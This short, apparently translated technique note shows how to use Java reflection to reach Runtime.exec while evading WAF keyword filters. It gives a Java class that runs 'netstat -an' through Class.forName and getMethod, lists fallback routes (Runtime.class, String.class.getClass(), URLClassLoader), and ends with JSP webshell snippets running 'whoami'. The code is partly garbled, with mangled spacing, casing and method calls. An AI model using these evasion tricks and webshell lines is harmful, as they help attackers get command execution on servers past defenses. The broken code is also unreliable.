In some cases, reflection can be used to call sensitive things to avoid some keywords or restrictions. For example, some WAF restrictions:
packageorg.javaweb.url; importjava.io.BufferedReader;importjava.io.InputStreamReader; publicclassz7y{ publicstaticvoidmain(String[] args)throwsException { BufferedReader br =newBufferedReader(newInputStreamReader(((Runtime)Class.forName("java.lang.Runtime").getMethod("getRuntime",newjava.lang.Class[]{}).invoke(null,newObject[]{})).exec("netstat -an").getInputStream())); String str =""; while((str=br.readLine())!=null){ System.out.println(str); } } }
Java imports the java. lang package by default, so you can directly use the Runtime object, but the java. lang. reflect package needs to be imported. If you do not want to import the package, you can directly call it in an indirect way. If the Class. forName is intercepted, you can change it:
String. class. getClass (). forName ("java. lang. Runtime ")... Of course, you can also use: Runtime. class to replace Class. forName ("java. lang. Runtime ").... If it is blocked, use URLClassLoader to try to bypass it. <% Out.println(newjava.io.bufferedreader(newjava.io.inputstreamreader(runtime.getruntime(cmd.exe c ("whoami "). getInputStream ())). readLine (); out. println ("If you only want to run the command, you do not want to view the result: <export runtime.getruntime(cmd.exe c ("whoami"); %>